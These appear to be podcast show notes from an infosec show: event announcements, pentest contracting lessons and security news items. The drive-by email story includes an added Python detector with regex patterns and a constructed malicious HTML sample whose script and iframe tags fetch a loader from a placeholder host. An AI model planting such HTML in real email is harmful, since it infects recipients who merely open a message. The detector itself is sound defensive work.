Episode 580 – Weekend Wrap-up with Dr. b0n3z [39:32 | 18.1 MB]
Guests: frontpage, connection, oncee, spridel
Announcements:
Unsung Heroes
Have you ever stumbled on a tool and wondered "Why didn't I know this existed!" or "If only I'd had this last week on that test"? Chris John Riley has started to gather suggestions for your "unsung hero" of the tools world. He is looking specifically for tools that aren't on every penetration tester's or forensic investigator's list, but that you have respect for. http://blog.c22.cc/2012/01/13/unsung-heros
Information Security Blogger Awards 2012
Since we were overlooked again for Best Podcast on Security, you can email ashimmy@hotmail.com with your name, email address and "ISD Podcast" as your write-in nominee. Please note that you have to provide your blog or podcast URL so it can be verified that you are a blogger or podcaster. Vote for your favorite blogs as well at http://www.ashimmy.com.
Brad Smith (theNurse)
We all know and love Brad Smith, aka theNurse. His humor and smiling positivity are a wonderful example for our community. At Hacker Halted he had a massive stroke and has been in the hospital ever since.
Brad and his wife did not ask for this help, but as a community we feel that if we can help, we want to. Please feel free to check in for status or to donate. Either way we thank you, and I know Brad thanks you for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
http://www.social-engineer.org/bradsmithdonation/
ShmooCon Epilogue
When: After ShmooCon
Where: Washington, DC
Hit up anyone in NOVA Hackers
Metasploit Framework Unleashed Cincinnati
When: February 11, 2012.
Where: Digitorium in Griffin Hall, the home of Northern Kentucky University’s College of Informatics
https://msfucincy.wordpress.com/
$20 donation for #HFC
Social Engineering Training
When: March 5-9, 2012
Where: Seattle, Washington
When: July 21-24, 2012
Where: Black Hat Vegas
When: August 20-24, 2012
Where: Bristol, UK
When: November 12-16, 2012
Where: Columbia, MD
http://www.social-engineer.com/social-engineer-training
Linuxfest Northwest 2012
When: Saturday-Sunday, April 28-29, 2012
Where: Bellingham Technical College – Bellingham, WA
http://www.linuxfestnorthwest.org/
CFP now open!
AIDE 2012
When: May 21-25, 2012
Where: MU Forensic Science Center
Huntington, West Virginia
http://aide.marshall.edu
CFP closes March 30!
LayerOne 2012
When: May 26-27, 2012
Where: Clarion Hotel – Anaheim, CA
http://www.layerone.org
CFP now open!
DerbyCon 2012 – "Dropping the Deuce"
When: September 27-30, 2012
Where: Louisville, KY
http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. If you’re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
Stories
Pentest Lessons:
Adam Compton and Zac Wagle should get credit for the "Pentest Lessons" idea. They also started a Twitter account: https://twitter.com/pentestlessons.
Lesson 1: If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. Core released some boilerplate examples about a year ago that are floating around on the internet, available to use freely. Also, when you talk to a lawyer, don't make small talk: the rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you have their attention.
Lesson 2: Depending on the nature of your pentest, consider adding geography into the scope agreement. Shortly after Firesheep was released, I caught an executive of the company I was testing as he accessed wifi at the Starbucks down the street. The company attempted to invalidate the results because I did not have a specific clause stating that I could act outside of the physical building.
Lesson 3: Many small-business IT outsourcing firms are now tacking "Security" onto their product offerings (for example "Bob's Computers: Service, Sales, Security"). As a result, many young techs are being shovelled into security audits without having any clue that security extends beyond asking whether backups are being stored offsite and whether user drives have appropriate permissions. Fear not, there's a resource for this: THE PTES. Read it, use the appropriate sections, and google the shit out of everything you don't understand.
[Thanks listener Adam]
On almost any given day, Twitter receives a handful of requests to delete tweets that link to pirated versions of copyrighted content—and quickly complies by erasing the offending tweets from its site.
But Twitter has taken the unusual step of making DMCA takedown notices public, in partnership with Chilling Effects, a project of the Electronic Frontier Foundation and several universities. The site shows 4,410 cease and desist notices dating back to November 2010. While most of 2011 shows daily or near-daily activity, there is just one notice in January 2012, suggesting either that Twitter is suddenly receiving fewer DMCA takedown notices or that the database is not quite up to date.
Twitter was already submitting data to Chilling Effects prior to this week, but this latest iteration makes it easier for users to locate Twitter-specific takedown notices. If you search the Chilling Effects site, you can also find many thousands of DMCA notices issued to Google, but Facebook has kept its own notices private.
Source: http://arstechnica.com/microsoft/news/2012/01/kinect-tech-shows-up-in-laptop-prototypes.ars
Kinect's vision and depth perception technology could soon be integrated into laptops. The Daily has seen two prototypes, believed to be from Asus, that incorporate an array of sensors above the top of the screen, replacing the traditional webcam. Below the display is a set of LEDs. Sources at Microsoft confirmed to The Daily that the laptops contain versions of the Kinect sensor.
Asus has dabbled with Kinect-like systems before. Its Xtion PRO PC peripheral uses sensor and software technology licensed from PrimeSense—technology also found in Microsoft's Kinect sensor.
What the sensor might be used for is anybody's guess. The Kinect for Windows—a version of the Xbox 360 accessory with revised firmware to support close-up operation—will be released in February, and with that, third-party applications that use the sensor will start to arrive. Windows 8 might even include direct support for Kinect-powered features: documents leaked in 2010 hinted at Kinect integration with automatic user switching using face detection.
Attackers have developed a new way to infect your PC through email without forcing you to click on an attachment.
According to researchers at eleven, a German security firm, the new "drive-by spam" automatically downloads malware when an email is opened in the email client. The user doesn't have to click on a link or open an attachment; just opening the email is enough, because the malicious content is carried in the HTML message body that the client renders on open.
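One way to triage incoming mail for this class of attack, as an added example that is not from the podcast or from eleven's report: it assumes the drive-by mechanism is active HTML content (script, iframe, object/embed, meta refresh, javascript: URIs or remote resources) inside a text/html MIME part, which an HTML-rendering client that loads remote content executes without any click. The sample messages are constructed inline with Python's standard email module; the hostnames in them are placeholders.

```python
"""Flag e-mail HTML parts that can fetch or run content on open.

Added example (not the podcast's or eleven's code). Assumption: the
drive-by payload is active HTML content in a text/html part, which a mail
client that renders HTML and loads remote content acts on without a click.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Constructs that a rendering mail client acts on with no user interaction.
ACTIVE_PATTERNS = {
    "script": re.compile(r"<\s*script\b", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
    "object_embed": re.compile(r"<\s*(object|embed)\b", re.I),
    "meta_refresh": re.compile(r"<\s*meta[^>]+http-equiv\s*=\s*['\"]?refresh", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "remote_resource": re.compile(r"\b(src|background)\s*=\s*['\"]?\s*(https?:)?//", re.I),
}


def find_active_content(raw_message: bytes) -> list:
    """Return (part_index, finding_name) pairs for every text/html part.

    Parts are decoded through the email package, so quoted-printable or
    base64 transfer encoding does not hide the markup from the patterns.
    """
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for idx, part in enumerate(msg.walk()):
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()
        for name, pattern in ACTIVE_PATTERNS.items():
            if pattern.search(html):
                findings.append((idx, name))
    return findings


def is_drive_by_candidate(raw_message: bytes) -> bool:
    """True if any HTML part carries content that runs or fetches on open."""
    return bool(find_active_content(raw_message))


def build_sample(html_body=None) -> bytes:
    """Construct a sample message offline (test data, not a real capture)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.test"
    msg["To"] = "victim@example.test"
    msg["Subject"] = "Invoice"
    msg.set_content("Your invoice is attached.")
    if html_body is not None:
        msg.add_alternative(html_body, subtype="html")
    return bytes(msg)


# Constructed bodies; the hostnames are placeholders, not real indicators.
MALICIOUS_HTML = (
    "<html><body><p>Open this invoice.</p>"
    '<script src="http://malware.example.test/loader.js"></script>'
    '<iframe src="http://malware.example.test/exploit.html" width="1" height="1"></iframe>'
    "</body></html>"
)
BENIGN_HTML = "<html><body><p>Your invoice is attached.</p></body></html>"


if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_HTML), ("benign", BENIGN_HTML), ("plain", None)):
        raw = build_sample(body)
        print(label, is_drive_by_candidate(raw), find_active_content(raw))
```

The patterns are a heuristic, not a parser: obfuscated or CSS-driven markup can slip past them, so they are a triage signal for mail gateways, not a substitute for configuring clients to render new mail as plain text and to block remote content and scripting.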
Source: http://blog.hacktalk.net/how-to-do-it-wrong/
As I’m sure many of you HackTalkers have read, UFC.com was recently defaced which led to Dana White essentially daring Anonymous to do it again.
I see stuff like this time and time again, a hacking forum will get pwned by some group and after picking up the pieces, the site which got hacked will talk crap about their attackers and essentially dare them to try it again. Inevitably the site will be hacked again because the administrators of the site are still leaving gaping security holes in their site. This is something that has been done time and time again.
This doesn't relate only to hacking either. In pretty much every walk of life, if someone kicked your ass once, you can be certain they can do it again, especially if you egg them on.